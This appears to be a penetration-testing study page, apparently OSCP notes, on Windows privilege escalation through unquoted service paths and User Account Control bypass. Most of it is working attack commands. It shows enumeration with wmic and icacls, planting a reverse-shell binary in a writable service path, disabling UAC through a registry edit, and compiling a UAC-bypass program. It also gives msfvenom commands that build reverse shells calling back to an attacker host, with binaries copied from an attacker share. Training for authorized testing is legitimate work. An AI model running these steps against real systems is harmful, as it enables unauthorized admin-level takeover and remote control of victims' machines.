Unquoted path Manual Exploitation

C:\Program Files directory, which contains a space character in its name.

https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation

Finding the correct binary path is possible Under services in Winpeas.

Also you can list the services with 

net start
wmic service list brief
sc query
Get-Service
 Services - Unquoted Paths
Conditions:

Path to service is unquoted and has spaces.
Running with LocalSystem or equivalent Administrative permissions.
User should have write permissions to a folder in the path.
User should have permission to start the service OR the service auto-restarts on shutdown/start-up.
Find unquoted paths with WMIC:

Find all services with "auto" start mode (automatically starts at system start-up),
cmd> wmic service get name,pathname,displayname,startmode | findstr /i auto | findstr /i /v "C:\Windows\\" | findstr /i /v """
Exploit steps:

Find unquoted service binpaths, for services run as ADMIN e.g. binpath= C:\Program Files\A bad folder\adminservice.exe.

Check if you have FULL/WRITE (F)(W) permissions along path using:

a) icacls "C:\Program Files\folder\A unquoted folder\adminservice.exe"

b) accesschk.exe -ucqv [/path/to/unquoted/folder] -accepteula

Generate reverse shell payload and rename to path e.g. A.exe.

Place malicious binary in path, so that it is executed e.g. move A.exe "C:\Program Files\folder".

Execute by restarting computer (if service has startmode = auto) with shutdown /r /t 0.

User Account Control (UAC) Bypass
Even if you are a local admin, User Account Control (UAC) maybe turned on which may force your user to respond to UAC credential/consent prompts in order to perform privileged actions.

UAC bypass walkthrough: https://ivanitlearning.wordpress.com/2019/07/07/bypassing-default-uac-settings-manually/
STEP 1: Check if we should perform UAC bypass

cmd> whoami /priv    # do we have very few privileges even as local admin?
cmd> whoami /groups  # is "Mandatgory Label\XXX Mandatory Level" set to MEDIUM?
cmd> psexec.exe -i -accepteula -d -s rshell.exe # are we getting issues running psexec as SYSTEM?

# check if UAC turned on
cmd> reg query HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System
...
EnableLUA                  REG_DWORD 0x1 # if 0x1 = UAC ENABLED
ConsentPromptBehaviorAdmin REG_DWORD 0x5 # if NOT 0x0 = consent required
PromptOnSecureDesktop      REG_DWORD 0x1 # if 0x1 = Force all credential/consent prompts
...

# try to disable UAC
cmd> reg add HKLM\Software\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /d 0 /t REG_DWORD
STEP 2: Prepare exploits

# modify uac-bypass.c to execute reverse shell
# compile w/ correct architecture
$ x86_64-w64-mingw32-gcc ~/OSCP-2022/Tools/privesc-windows/uac-bypass.c -o uac-bypass.exe

# generate reverse shell payload
$  msfvenom -a x64 -p windows/x64/shell_reverse_tcp LHOST=[kali] LPORT=666 -f exe -o rshell.exe
STEP 3: Transfer, setup listener and exec payload

cmd> copy \\[kali]\[share]\uac-bypass.exe uac-bypass.exe
cmd> copy \\[kali]\[share]\rshell.exe rshell.exe
cmd> .\uac-bypass.exe

msfvenom -p windows/shell_reverse_tcp LHOST=192.168.119.129 LPORT=443 -f exe > program.exe

PreviousWindows XP SP0/SP1 Priv escNextPass the hash

Last updated